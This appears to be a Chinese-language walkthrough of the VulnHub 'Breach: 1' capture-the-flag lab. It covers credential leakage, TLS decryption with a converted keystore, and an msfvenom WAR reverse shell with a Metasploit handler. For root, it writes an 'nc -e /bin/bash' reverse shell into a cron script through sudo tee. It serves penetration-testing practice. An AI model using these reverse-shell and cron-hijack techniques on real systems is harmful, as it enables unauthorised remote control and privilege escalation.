Breach: 1

项目地址:https://download.vulnhub.com/breach/Breach-1.0.zip

是一个打包好的镜像文件

注意:导入 vmx 时一定要选择我已移动,否则没网

弱口令

敏感信息泄露

使用 Nmap 扫不出来,直接访问 80 端口查看源代码拿到 Base64 注释

经过两次解码得到

1
pgibbons:damnitfeel$goodtobeagang$ta

点击图片跳转到一个页面

再点击 Employee portal 跳转到一个 CMS

使用上面的账号密码成功登录

CTF

TLS 流量解密

点击 Inbox 发现有三封邮件

查看邮件内容

1
2
3
转发:感谢您购买 Super Secret Cert Pro!

Peter,我不确定这是什么。我把文件保存在这里:192.168.110.140/.keystore Bob ------------------------------------------------------------------------------------------------------------------------------------------- 发件人:registrar@penetrode.com 发送时间:2016年6月2日 16:16 收件人:bob@initech.com; admin@breach.local 主题:感谢您购买 Super Secret Cert Pro!附件是您的新 SSL 证书。请勿与任何人分享!
1
2
3
4
5
6
7
IDS/IPS 系统

嘿,彼得,

我上周在 Chotchkie's 的欢乐时光聚会上认识了一位供应商,他给我推荐了一套 IDS/IPS 系统,价格非常优惠!

——迈克尔
1
2
3
发布敏感内容

Peter,是的,我得请你让你的团队只在管理员门户网站上发布敏感文件。我的密码非常安全。如果你能告诉他们这些就太好了。——Bill

由上述内容可以得知部署了 IDS/IPS 安全设备,所以我们才无法扫描

同时他还购买了新的 SSL 证书,我们尝试搜索看看就可以下载他买的证书

发现是一个流量包,点击统计 –> 会话发现主要通信的端口是 8443,这个端口是 tomcat 的默认端口

但因为流量被 SSL 加密了,所以需要导入密钥解密

先查看密钥的类型,发现是 Java 密钥库文件(JKS 格式)

Wireshark 支持的私钥格式通常是 PKCS#12.p12.pfx)或 PEM

我们下载的 keystore 是 JKS 格式,需先转换

1
2
3
4
5
keytool -importkeystore \
  -srckeystore keystore \
  -destkeystore mykeystore.p12 \
  -deststoretype PKCS12 \
  -srcalias tomcat
  • -srckeystore:原始 JKS 文件
  • -destkeystore:输出的 PKCS12 文件名(例如 mykeystore.p12
  • -deststoretype PKCS12:指定目标格式
  • -srcalias tomcat:密钥库中条目的别名

这里密码我们使用默认的密码 tomcat 尝试

然后在编辑首选项中导入 RSA 密钥

关闭后再次打开就能看到解密的 HTTP 流量了

追踪 HTTP 流量发现有一段 Base64 编码

解码得到新的一张账号密码

访问其流量中的路径

RCE

Tomcat Manager 后台上传恶意 WAR 包

使用 MSF 制作 WAR 包

1
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.128 LPORT=4444 -f war > /root/Desktop/update.war

上传上去(我这里不知道为什么访问不了)

启动 MSF

1
2
3
4
5
6
msfconsole
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp   # 或 java/jsp_shell_reverse_tcp
set LHOST 192.168.110.128
set LPORT 4444
exploit -j

然后在浏览器中访问

1
https://192.168.110.140:8443/update/

此时,监听器会收到一个 Meterpreter 会话

提权

敏感信息泄露

我们找到了一张名为 bill.png 的图片

读取它的元数据拿到隐藏的密码

提权到 blumbergh 用户上去

权限配置不当 + 定时任务

进一步查看系统配置,发现一个定时任务脚本 /usr/share/cleanup/tidyup.sh,且通过 sudo -l 或观察文件权限,发现 blumbergh 用户可以使用 sudo 以 root 身份执行某些命令,尤其是能够写入该脚本

查看脚本内容,发现它每三分钟由 cron 执行一次,目的是清理系统临时文件。攻击者可以修改这个脚本,加入反弹 Shell 的代码,等待 cron 执行

由于 blumbergh 用户没有直接写入 /usr/share/cleanup/tidyup.sh 的权限,但可以通过 sudo tee 来写入

1
echo "nc -e /bin/bash 192.168.110.128 8443" | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh

在攻击机启动监听完成提权

1
nc -lvp 8443